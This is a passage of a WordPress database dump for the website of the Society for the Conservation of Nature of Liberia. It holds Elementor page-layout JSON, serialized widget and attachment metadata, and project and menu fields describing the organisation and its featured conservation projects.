Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18930,2772,'_thumbnail_id','2770'),(18932,2773,'_elementor_edit_mode','builder'),(18933,2773,'_elementor_template_type','wp-post'),(18934,2773,'_elementor_version','2.7.5'),(18935,2773,'_wp_page_template','default'),(18936,2773,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18937,2773,'_thumbnail_id','2770'),(18938,2769,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18939,2774,'_elementor_edit_mode','builder'),(18940,2774,'_elementor_template_type','wp-post'),(18941,2774,'_elementor_version','2.7.5'),(18942,2774,'_wp_page_template','default'),(18943,2774,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18944,2774,'_thumbnail_id','2770'),(18945,2774,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18946,2775,'_thumbnail_id','2776'),(18947,2775,'_wp_page_template','default'),(18948,2775,'_elementor_controls_usage','a:0:{}'),(18949,2775,'funder','Government of Liberia; Other Donors'),(18950,2775,'partners','Forestry Development Authority (FDA); Royal Society for the Protection of Birds (RSPB)'),(18951,2775,'_pods_project_status','On-going'),(18953,2775,'project_link','<a href=\"https://scnlliberia.org/golama-project/\" target=\"_blank\" rel=\"noopener\">https://scnlliberia.org/golama-project/</a>'),(18954,2775,'_dp_original','2748'),(18955,2775,'_edit_lock','1591806371:38'),(18956,2775,'_edit_last','1'),(18957,2776,'_wp_attached_file','2019/11/featured_scnl_project.jpg'),(18958,2776,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:653;s:4:\"file\";s:33:\"2019/11/featured_scnl_project.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"featured_scnl_project-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"featured_scnl_project-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"featured_scnl_project-768x490.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:490;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18959,2775,'project_status','On-going'),(18960,2778,'_menu_item_type','custom'),(18961,2778,'_menu_item_menu_item_parent','0'),(18962,2778,'_menu_item_object_id','2778'),(18963,2778,'_menu_item_object','custom'),(18964,2778,'_menu_item_target','_blank'),(18965,2778,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18966,2778,'_menu_item_xfn',''),(18967,2778,'_menu_item_url','https://scnlliberia.org/'),(18969,2778,'_menu_item_template',''),(18970,2778,'_menu_item_mega_template','0'),(18971,2778,'_menu_item_nolink',''),(18972,2778,'_menu_item_category_post',''),(18973,2778,'_menu_item_megamenu',''),(18974,2778,'_menu_item_megamenu_auto_width',''),(18975,2778,'_menu_item_megamenu_col',''),(18976,2778,'_menu_item_megamenu_heading',''),(18977,2778,'_menu_item_megamenu_widgetarea','0'),(18978,2778,'_menu_item_icon',''),(18979,2778,'_elementor_controls_usage','a:0:{}'),(18980,2780,'_elementor_controls_usage','a:0:{}'),(18982,2780,'_ca_post_type','2769'),(18983,2779,'_edit_last','1'),(18984,2779,'_elementor_controls_usage','a:0:{}'),(18985,2779,'_ca_handle','0'),(18986,2779,'_ca_host','sidebar'),(18987,2779,'_ca_merge_pos','0'),(18988,2779,'_edit_lock','1574725918:1'),(18989,2781,'_wp_attached_file','2019/11/SCNL_Liberia_Logo-150x150.png'),(18990,2781,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:37:\"2019/11/SCNL_Liberia_Logo-150x150.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18992,2782,'_wp_attached_file','2019/11/featured_moa.jpg'),(18993,2782,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:24:\"2019/11/featured_moa.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"featured_moa-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"featured_moa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"featured_moa-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573705184\";s:9:\"copyright\";s:0:\"\";s:12:\"f